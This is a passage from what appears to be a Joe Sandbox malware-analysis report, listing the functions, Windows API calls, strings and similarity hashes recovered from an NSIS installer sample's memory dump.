                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                          • lstrlenA.KERNEL32(00429868,?,00429868,0042DC00), ref: 00403D8E
                                                          • SetWindowTextA.USER32(?,00429868), ref: 00403D9D
                                                          • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 184305955-0
                                                          • Opcode ID: 89e1168e402d04a6884629a41500819bc31e4f7db7bbfd7358c180d68350a674
                                                          • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                          • Opcode Fuzzy Hash: 89e1168e402d04a6884629a41500819bc31e4f7db7bbfd7358c180d68350a674
                                                          • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E
                                                          Function 0040405D Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                          • GetSysColor.USER32(?), ref: 0040412B
                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                          • lstrlenA.KERNEL32(?), ref: 0040414C
                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                          • SendMessageA.USER32(00000000), ref: 004041D5
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                          • SetCursor.USER32(00000000), ref: 00404258
                                                          • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                          • SetCursor.USER32(00000000), ref: 0040427B
                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: (@@$N$open
                                                          • API String ID: 3615053054-4158277975
                                                          • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                          • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                          • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                          • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                          Function 004036AF Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                            • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                          • lstrcatA.KERNEL32(00435000,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,75923410,00435400,00434000,00000000), ref: 0040372A
                                                          • lstrlenA.KERNEL32(0042D3A0,?,?,?,0042D3A0,00000000,00434400,00435000,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,75923410), ref: 0040379F
                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                          • GetFileAttributesA.KERNEL32(0042D3A0), ref: 004037BD
                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00434400), ref: 00403806
                                                            • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                          • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                          • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                          • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                          • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 1975747703-2904746566
                                                          • Opcode ID: 15a455c79fece2dcda9c86dfaf1125d35941ba458b98b68e8c70ea8c6fc28151
                                                          • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                          • Opcode Fuzzy Hash: 15a455c79fece2dcda9c86dfaf1125d35941ba458b98b68e8c70ea8c6fc28151
                                                          • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D
                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,0042DC00,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                          • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                          • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                          • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                          Function 00405A78 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                          • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                            • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                            • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                          • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                          • wsprintfA.USER32 ref: 00405AEF
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                          • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                            • Part of subcall function 004059A2: GetFileAttributesA.KERNEL32(00000003,00402CA6,00435C00,80000000,00000003), ref: 004059A6
                                                            • Part of subcall function 004059A2: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                          • String ID: %s=%s$NUL$[Rename]
                                                          • API String ID: 222337774-4148678300
                                                          • Opcode ID: 0c50eb09e583338ef7ecdda6ae2002cf09a3ce7e7e8240124cc9ac734fa8403c
                                                          • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                          • Opcode Fuzzy Hash: 0c50eb09e583338ef7ecdda6ae2002cf09a3ce7e7e8240124cc9ac734fa8403c
                                                          • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                          Function 00404352 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                          • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                          • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                          • lstrcmpiA.KERNEL32(0042D3A0,00429868), ref: 004044B9
                                                          • lstrcatA.KERNEL32(?,0042D3A0), ref: 004044C5
                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                            • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,00434000,75923410,00435400,00000000,004030EA,00435400,00435400,004032FF), ref: 00405FF2
                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,00434000,75923410,00435400,00000000,004030EA,00435400,00435400,004032FF), ref: 00406004
                                                            • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,75923410,00435400,00000000,004030EA,00435400,00435400,004032FF), ref: 00406014
                                                          • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                            • Part of subcall function 00404709: lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                            • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                            • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A
                                                          • API String ID: 2624150263-3554254475
                                                          • Opcode ID: 57310190734ee8f346be83e1cb7f981a0d8ab0a60c9531f780aaa692ea2f78ba
                                                          • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                          • Opcode Fuzzy Hash: 57310190734ee8f346be83e1cb7f981a0d8ab0a60c9531f780aaa692ea2f78ba
                                                          • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                          Function 00405D51 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 199stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetVersion.KERNEL32(?,00429048,00000000,00404F80,00429048,00000000), ref: 00405E02
                                                          • GetSystemDirectoryA.KERNEL32(0042D3A0,00000400), ref: 00405E7D
                                                          • GetWindowsDirectoryA.KERNEL32(0042D3A0,00000400), ref: 00405E90
                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405ECC
                                                          • SHGetPathFromIDListA.SHELL32(?,0042D3A0), ref: 00405EDA
                                                          • CoTaskMemFree.OLE32(?), ref: 00405EE5
                                                          • lstrcatA.KERNEL32(0042D3A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                          • lstrlenA.KERNEL32(0042D3A0,?,00429048,00000000,00404F80,00429048,00000000), ref: 00405F59
                                                          Strings
                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405F01
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E4C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-730719616
                                                          • Opcode ID: 4b4f6d4be9a7cdf5a80b7e66d5c1c973ac9c95f8c70165c0c062674a5d01c598
                                                          • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                          • Opcode Fuzzy Hash: 4b4f6d4be9a7cdf5a80b7e66d5c1c973ac9c95f8c70165c0c062674a5d01c598
                                                          • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
                                                          Function 00402C66 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402C77
                                                          • GetModuleFileNameA.KERNEL32(00000000,00435C00,00000400), ref: 00402C93
                                                            • Part of subcall function 004059A2: GetFileAttributesA.KERNEL32(00000003,00402CA6,00435C00,80000000,00000003), ref: 004059A6
                                                            • Part of subcall function 004059A2: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                          • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,00434C00,00434C00,00435C00,00435C00,80000000,00000003), ref: 00402CDF
                                                          Strings
                                                          • soft, xrefs: 00402D54
                                                          • Null, xrefs: 00402D5D
                                                          • Inst, xrefs: 00402D4B
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                          • Error launching installer, xrefs: 00402CB6
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 4283519449-1074636621
                                                          • Opcode ID: 4eb7fdbfa3b6d290a18a6bc5ec9469a4ae157c267e60227b4c2036f25b06a2cd
                                                          • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                          • Opcode Fuzzy Hash: 4eb7fdbfa3b6d290a18a6bc5ec9469a4ae157c267e60227b4c2036f25b06a2cd
                                                          • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD
                                                          Function 00402E9F Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: DA$ DA$... %d%%
                                                          • API String ID: 551687249-812340929
                                                          • Opcode ID: 94217b9421280a8461e3ee4b3a8dd366ffe4823102cebc53530c4dd28de20846
                                                          • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                          • Opcode Fuzzy Hash: 94217b9421280a8461e3ee4b3a8dd366ffe4823102cebc53530c4dd28de20846
                                                          • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA
                                                          Function 00403F7B Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                          • GetSysColor.USER32(00000000), ref: 00403FB4
                                                          • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                          • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                          • GetSysColor.USER32(?), ref: 00403FDF
                                                          • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                          • DeleteObject.GDI32(?), ref: 00404009
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                          • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                          • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                          • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                          Function 00404F48 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00429048,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                          • lstrlenA.KERNEL32(00402FFA,00429048,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                          • lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,?,759223A0), ref: 00404FA4
                                                          • SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 9e98d1af16aeab65ed7421f45f6da79edb9cc0a06014319387cc05644491ab37
                                                          • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                          • Opcode Fuzzy Hash: 9e98d1af16aeab65ed7421f45f6da79edb9cc0a06014319387cc05644491ab37
                                                          • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                          Function 00404813 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                          • GetMessagePos.USER32 ref: 00404836
                                                          • ScreenToClient.USER32(?,?), ref: 00404850
                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3198119429.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000007.00000002.3198052124.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198133351.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.3198165131.0000000000449000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_Ultradolichocephaly.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                          • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                          • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                          • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
